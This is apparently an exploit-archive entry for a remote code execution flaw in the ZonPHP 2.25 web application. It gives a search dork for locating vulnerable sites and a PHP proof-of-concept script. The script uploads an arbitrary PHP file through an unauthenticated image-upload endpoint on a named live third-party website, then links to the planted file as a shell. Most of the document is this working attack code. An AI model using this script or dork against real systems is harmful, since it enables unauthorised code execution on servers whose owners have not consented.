# Exploit Title: ZonPHP V2.25 RCE Vulnerability # Google Dork: intext:"Made by SLAPER" # Date: 21-10-2013 # Exploit Author: Halim Cruzito # Vendor Homepage: http://www.slaper.be # Software Link: http://www.slaper.be/zonPHPv225.zip # Version: v2.25 # Tested on: Windows 7 # PoC: <?php $url = "http://spp-neunkirchen.de/"; $path = "ofc/ofc_upload_image.php?name="; $filename = "up.php"; $data = "<?php phpinfo(); ?>"; $headers = array("User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0",� "Content-Type: text/plain"); $rc = curl_init(); curl_setopt($rc, CURLOPT_URL, $url.$path.$filename); curl_setopt($rc, CURLOPT_HTTPHEADER, $headers); curl_setopt($rc, CURLOPT_POST, 1); curl_setopt( $rc, CURLOPT_SSL_VERIFYPEER, 1); curl_setopt($rc, CURLOPT_POSTFIELDS, $data); curl_setopt($rc, CURLOPT_RETURNTRANSFER, 1); $ex = curl_exec($rc); curl_close($rc);� $shelllink = ''.$url.''.$filename.''; echo '<a href="'.$shelllink.'" target="blank">Exploited Click Here!</a>'; ?> �=============================================== |Loveto:Karoxx Puyoo ^^ and all Malaysian HaXor | �===============================================Брой прочитания на тази страница: 1138
ZonPHP 2.25 – Remote Code Execution (RCE) Vulnerability